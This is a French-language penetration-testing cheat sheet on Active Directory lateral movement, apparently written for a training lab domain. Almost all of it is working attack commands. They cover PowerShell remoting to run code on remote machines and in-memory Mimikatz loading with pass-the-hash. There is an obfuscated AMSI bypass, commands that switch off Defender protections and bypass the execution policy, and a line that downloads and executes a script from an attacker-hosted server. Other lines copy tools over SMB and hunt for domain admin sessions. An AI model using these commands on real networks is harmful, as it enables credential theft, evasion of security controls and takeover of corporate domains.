Bebzounette
Rechercher…
Lateral Movement

ADModule:

1
Import-Module ..\\Microsoft.ActiveDirectory.Management.dll
2
Import-Module .\\ActiveDirectory.psd1
Copied!

Créer une session :

1
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
2
Enter-PSSession -Session $sess
Copied!

Exécuter des commandes sur cette session :

1
Invoke-command -ScriptBlock {whoami} -ComputerName (Get-Content <list_of_servers>) # Injection de la commande "whoami" dans une list de machines
2
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
3
Invoke-command -Filepath C:\\AD\\Tools\\Invoke-Mimikatz.ps1 -Session $sess # Load d'une fonction directement dans la mémoire de la machine ciblée
4
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess # Appel d'une fonction en la loadant directement dans la mémoire
Copied!

Pass-The-Hash :

1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell.exe"'
Copied!

Checklist création de session :

  • Checker le mode language :
1
$ExecutionContext.SessionState.LanguageMode #Si c'est ConstrainedLanguage il nous sera impossible d'executer des modules
Copied!
  • Si on est en mode ConstrainedLanguage checker la politique AppLocker :
1
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Copied!
  • Bypasser AMSI dès la création de la session :
1
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Copied!
  • Désactiver AV :
1
Set-MpPreference -DisableRealtimeMonitoring $true
2
Set-MpPreference -DisableIOAVProtection $true
Copied!
  • Bypass de l'execution policy :
1
powershell -ep bypass
Copied!
  • Download de scripts
1
iex (iwr <http://172.16.100.X/PowerView.ps1> -UseBasicParsing) #via un HFS
2
Copy-Item .\\Invoke-MimikatzEx.ps1 \\\\dcorp-adminsrv.dollarcorp.moneycorp.local\\c$\\"Program Files" # Utiliser le SMB Protocole
Copied!

Énumération Latérale

  • Checker les accès sur d'autres machines avec les privilèges de LocalAdmin
1
Find-LocalAdminAccess
Copied!
  • Checker si un Domain Admin s'est connectée sur une des machines accessibles avec les privilège Local Admin :
1
Invoke-UserHunter -CheckAccess #par default groupe domain admin
2
Invoke-UserHunter -GroupName "RDPUser" -CheckAccess
Copied!
  • Et rebelote au début pour jusqu'à trouver un compte permettant une privesc